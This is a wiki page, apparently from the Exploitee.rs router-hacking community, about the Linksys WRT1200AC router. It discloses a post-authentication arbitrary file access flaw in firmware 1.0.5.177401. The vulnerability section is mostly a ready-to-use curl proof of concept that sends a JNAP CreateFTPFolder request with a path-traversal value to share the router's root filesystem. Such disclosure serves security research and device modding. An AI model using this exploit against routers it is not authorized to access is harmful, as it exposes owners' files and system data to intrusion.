Linksys WRT1200AC

From Exploitee.rs
Revision as of 23:59, 3 August 2017 by 0x00string (talk | contribs) (Created page with "__FORCETOC__ {{Disclaimer}} thumb|320px Category:Linksys WRT1200AC =Linksys WRT1200AC= Built on the foundation of our original WRT's open-...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

"Although the information we release has been verified and shown to work to the best our knowledge, we cant be held accountable for bricked devices or roots gone wrong."

LINKSYS WRT1200AC.JPG

Linksys WRT1200AC

Built on the foundation of our original WRT's open-source heritage, the Linksys WRT1200AC delivers superior network performance for the most demanding users. The WRT1200AC features two external antennas, a powerful 1.3GHz dual-core ARM, and Wireless-AC to provide high-speed Wi-Fi connections with exceptional range.

Amazon


Post Authentication Arbitrary File Access

Arbitrary file access due to improper sanitization of path field in media sharing setup.

POC

​ Firmware Version: 1.0.5.177401


The following curl command is a Proof of Concept which demonstrates creating a file share at /.

curl -i -s -k  -X 'POST' \
-H 'Content-Type: application/json; charset=UTF-8' -H 'X-JNAP-Action: http://linksys.com/jnap/storage/CreateFTPFolder' \
-H 'Expires: Fri, 10 Oct 2013 14:19:41 GMT' -H 'X-JNAP-Authorization: Basic <BASE64 CREDS>' \
-H 'X-Requested-With: XMLHttpRequest' \
-H 'Referer: http://192.168.1.1/ui/1.0.99.177401/dynamic/home.html' \
-b 'initial-tab=; visited-index=true; ui-language=en-US; modelNumber=WRT1200AC; smartmap-filter-values=computer%2Cmobile%2Cprinter%2Cother%2Clan%2CwirelessTwo%2CwirelessFive%2CwirelessFive-2; smartmap-filter-set=online-network; admin-auth=Basic%20<BASE64 CREDS>; current-applet=A2DB16C0-59B9-4C79-9BF2-E5A3A307F9C1' \
--data-binary $'{\"name\":\"HAXHAXHAX\",\"partitionName\":\"/dev/sda1\",\"path\":\"/../../../../../../\",\"isReadOnly\":false,\"groupsWithPermission\":[\"testuser\",\"admin\"]}' \
'http://192.168.1.1/JNAP/'